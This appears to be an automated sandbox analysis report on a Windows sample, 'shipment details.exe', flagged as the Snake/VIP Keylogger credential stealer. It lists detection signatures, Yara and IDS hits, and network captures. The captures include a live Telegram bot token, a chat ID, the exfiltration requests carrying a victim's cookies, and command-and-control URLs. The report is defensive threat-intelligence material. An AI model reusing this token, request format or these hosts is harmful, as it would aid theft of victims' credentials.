Windows Analysis Report
shipment details.exe

Overview

General Information

Sample name: shipment details.exe
Analysis ID: 1529185
MD5: 606686ad6a08ebe2cc694b5618cfaab5
SHA1: 06f5f2c91d2a4c7e02547ed997a4db3b92352971
SHA256: f13526451639d7df1a8100047250b017cbfc065ce1271b6ffa30bc49de024d54
Tags: exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat_id": "2135869667", "Version": "4.4"}
Source: 0.2.shipment details.exe.3cb5630.3.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8", "Chat id": "2135869667"}
Source: shipment details.exe.4788.1.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendMessage"}
Multi AV Scanner detection for submitted file
Source: shipment details.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: shipment details.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: shipment details.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: shipment details.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 0133F45Dh 1_2_0133F2C0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 0133F45Dh 1_2_0133F4AC
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 0133FC19h 1_2_0133F960
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BD31E0h 1_2_06BD2DC8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BD0D0Dh 1_2_06BD0B30
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BD1697h 1_2_06BD0B30
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BD2C19h 1_2_06BD2968
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDE959h 1_2_06BDE6B0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDE0A9h 1_2_06BDDE00
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDF209h 1_2_06BDEF60
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDCF49h 1_2_06BDCCA0
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BD31E0h 1_2_06BD2DC2
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDD7F9h 1_2_06BDD550
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDE501h 1_2_06BDE258
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDF661h 1_2_06BDF3B8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDEDB1h 1_2_06BDEB08
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDD3A1h 1_2_06BDD0F8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDFAB9h 1_2_06BDF810
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 1_2_06BD0040
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BDDC51h 1_2_06BDD9A8
Source: C:\Users\user\Desktop\shipment details.exe Code function: 4x nop then jmp 06BD31E0h 1_2_06BD310E

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2Host: api.telegram.orgContent-Length: 1257
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
Source: unknown HTTP traffic detected: POST /bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce87960e4dfa2Host: api.telegram.orgContent-Length: 1257
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 16:21:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20a
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62359
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 62359 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
